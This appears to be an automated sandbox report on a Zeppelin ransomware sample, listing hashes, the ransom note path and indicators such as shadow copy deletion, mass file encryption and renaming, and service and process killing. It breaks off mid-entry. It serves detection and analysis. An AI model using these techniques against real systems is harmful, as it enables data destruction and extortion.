Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
01-08-2023 16:43
Behavioral task
behavioral1
Sample
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
-
Size
225KB
-
MD5
3145cd124db5c8c34e053aea87694baa
-
SHA1
5645f85669b81b82936a821900425046a511dc8d
-
SHA256
52e8721e17365eb4281908df3ffbe6920ad0da496ec7b6288812e564002801b7
-
SHA512
a180166e2cc56ec429e7edfee7fbf8e2cbf3ec64190a0270995340ece4047d525d239b8230759bf2f1f17912b6e357c06608c2414658d3cd03edb28c36b006e1
-
SSDEEP
6144:3SK1AqRHi/EXtw+apQ3an64DQFu/U3buRKlemZ9DnGAeOhYp+c:3osHiGWRpQb4DQFu/U3buRKlemZ9DnGn
Malware Config
Extracted
C:\Program Files\Java\jdk1.7.0_80\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT
https://tox.chat/download.html
Signatures
-
Detects Zeppelin payload 15 IoCs
Processes:
resource yara_rule behavioral1/memory/2916-57-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/744-3234-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-4371-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/744-7033-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-8132-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/744-10833-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-11709-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-13586-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-17184-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-20988-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-24127-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-26757-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-28447-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/2852-30486-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin behavioral1/memory/744-30521-0x0000000000170000-0x00000000002B3000-memory.dmp family_zeppelin -
Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (7459) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
notepad.exepid process 1048 notepad.exe -
Enumerates connected drives 3 TTPs 32 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exesc.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\V: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\P: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\K: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\G: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\B: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\N: sc.exe File opened (read-only) \??\Y: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\X: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\Z: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\L: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\E: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\A: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\M: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\H: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\J: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\T: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\N: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\O: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\R: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\Q: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\I: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\W: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened (read-only) \??\U: 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe -
Drops file in Program Files directory 64 IoCs
Processes:
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue.css.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\XLMACRO.CHM.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0221903.WMF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21533_.GIF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\SpiderSolitaire.exe.mui 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Microsoft Games\More Games\de-DE\MoreGames.dll.mui 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Notebook03.onepkg 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Executive.eftx.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CHECKER.POC 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115868.GIF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.DLL.IDX_DLL.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMASTHD.DPV.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB2A.BDR.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21326_.GIF.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR41F.GIF 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXC 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_disable.gif 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_GreenTea.gif.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR.1F5-33B-521 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1860 sc.exe 680 sc.exe 1144 sc.exe 820 sc.exe 2380 sc.exe 1752 sc.exe 2672 sc.exe 2008 sc.exe 2688 sc.exe 2864 sc.exe 2640 sc.exe 1992 sc.exe 3008 sc.exe 1928 sc.exe 1928 sc.exe 1996 sc.exe 2380 sc.exe 2480 sc.exe 1592 sc.exe 2480 sc.exe 2088 sc.exe 2744 sc.exe 1700 sc.exe 2172 sc.exe 580 sc.exe 1032 sc.exe 1468 sc.exe 2116 sc.exe 320 sc.exe 2744 sc.exe 2188 sc.exe 1996 sc.exe 3044 sc.exe 1896 sc.exe 1040 sc.exe 272 sc.exe 280 sc.exe 2040 sc.exe 2292 sc.exe 1732 sc.exe 304 sc.exe 2168 sc.exe 2552 sc.exe 2884 sc.exe 1036 sc.exe 2012 sc.exe 1088 sc.exe 1860 sc.exe 2020 sc.exe 1712 sc.exe 2736 sc.exe 2300 sc.exe 2832 sc.exe 1656 sc.exe 2248 sc.exe 2008 sc.exe 1468 sc.exe 1348 sc.exe 1940 sc.exe 3016 sc.exe 2308 sc.exe 972 sc.exe 2152 sc.exe 2856 sc.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2188 tasklist.exe 1032 tasklist.exe 2260 tasklist.exe 2724 tasklist.exe 2372 tasklist.exe 2856 tasklist.exe -
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1684 vssadmin.exe 2804 vssadmin.exe 936 vssadmin.exe 1964 vssadmin.exe 1924 vssadmin.exe 660 vssadmin.exe 2300 vssadmin.exe 1808 vssadmin.exe 2324 vssadmin.exe 2412 vssadmin.exe 996 vssadmin.exe 2800 vssadmin.exe -
Kills process with taskkill 25 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2692 taskkill.exe 1076 taskkill.exe 1956 taskkill.exe 2368 taskkill.exe 3028 taskkill.exe 2056 taskkill.exe 1740 taskkill.exe 3048 taskkill.exe 1304 taskkill.exe 340 taskkill.exe 612 taskkill.exe 1012 taskkill.exe 1796 taskkill.exe 3020 taskkill.exe 1988 taskkill.exe 1692 taskkill.exe 1720 taskkill.exe 1752 taskkill.exe 2276 taskkill.exe 2856 taskkill.exe 2776 taskkill.exe 1244 taskkill.exe 1540 taskkill.exe 3020 taskkill.exe 1108 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exepid process 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2772 WMIC.exe Token: SeSecurityPrivilege 2772 WMIC.exe Token: SeTakeOwnershipPrivilege 2772 WMIC.exe Token: SeLoadDriverPrivilege 2772 WMIC.exe Token: SeSystemProfilePrivilege 2772 WMIC.exe Token: SeSystemtimePrivilege 2772 WMIC.exe Token: SeProfSingleProcessPrivilege 2772 WMIC.exe Token: SeIncBasePriorityPrivilege 2772 WMIC.exe Token: SeCreatePagefilePrivilege 2772 WMIC.exe Token: SeBackupPrivilege 2772 WMIC.exe Token: SeRestorePrivilege 2772 WMIC.exe Token: SeShutdownPrivilege 2772 WMIC.exe Token: SeDebugPrivilege 2772 WMIC.exe Token: SeSystemEnvironmentPrivilege 2772 WMIC.exe Token: SeRemoteShutdownPrivilege 2772 WMIC.exe Token: SeUndockPrivilege 2772 WMIC.exe Token: SeManageVolumePrivilege 2772 WMIC.exe Token: 33 2772 WMIC.exe Token: 34 2772 WMIC.exe Token: 35 2772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1852 WMIC.exe Token: SeSecurityPrivilege 1852 WMIC.exe Token: SeTakeOwnershipPrivilege 1852 WMIC.exe Token: SeLoadDriverPrivilege 1852 WMIC.exe Token: SeSystemProfilePrivilege 1852 WMIC.exe Token: SeSystemtimePrivilege 1852 WMIC.exe Token: SeProfSingleProcessPrivilege 1852 WMIC.exe Token: SeIncBasePriorityPrivilege 1852 WMIC.exe Token: SeCreatePagefilePrivilege 1852 WMIC.exe Token: SeBackupPrivilege 1852 WMIC.exe Token: SeRestorePrivilege 1852 WMIC.exe Token: SeShutdownPrivilege 1852 WMIC.exe Token: SeDebugPrivilege 1852 WMIC.exe Token: SeSystemEnvironmentPrivilege 1852 WMIC.exe Token: SeRemoteShutdownPrivilege 1852 WMIC.exe Token: SeUndockPrivilege 1852 WMIC.exe Token: SeManageVolumePrivilege 1852 WMIC.exe Token: 33 1852 WMIC.exe Token: 34 1852 WMIC.exe Token: 35 1852 WMIC.exe Token: SeBackupPrivilege 2424 vssvc.exe Token: SeRestorePrivilege 2424 vssvc.exe Token: SeAuditPrivilege 2424 vssvc.exe Token: SeIncreaseQuotaPrivilege 1852 WMIC.exe Token: SeSecurityPrivilege 1852 WMIC.exe Token: SeTakeOwnershipPrivilege 1852 WMIC.exe Token: SeLoadDriverPrivilege 1852 WMIC.exe Token: SeSystemProfilePrivilege 1852 WMIC.exe Token: SeSystemtimePrivilege 1852 WMIC.exe Token: SeProfSingleProcessPrivilege 1852 WMIC.exe Token: SeIncBasePriorityPrivilege 1852 WMIC.exe Token: SeCreatePagefilePrivilege 1852 WMIC.exe Token: SeBackupPrivilege 1852 WMIC.exe Token: SeRestorePrivilege 1852 WMIC.exe Token: SeShutdownPrivilege 1852 WMIC.exe Token: SeDebugPrivilege 1852 WMIC.exe Token: SeSystemEnvironmentPrivilege 1852 WMIC.exe Token: SeRemoteShutdownPrivilege 1852 WMIC.exe Token: SeUndockPrivilege 1852 WMIC.exe Token: SeManageVolumePrivilege 1852 WMIC.exe Token: 33 1852 WMIC.exe Token: 34 1852 WMIC.exe Token: 35 1852 WMIC.exe Token: SeIncreaseQuotaPrivilege 2772 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3145cd124db5c8c34e053aea87694baa_zeppelin_JC.execmd.execmd.execmd.exedescription pid process target process PID 744 wrote to memory of 2216 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2216 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2216 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2216 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2204 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2204 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2204 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2204 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2628 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 wrote to memory of 2628 744 3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe cmd.exe PID 744 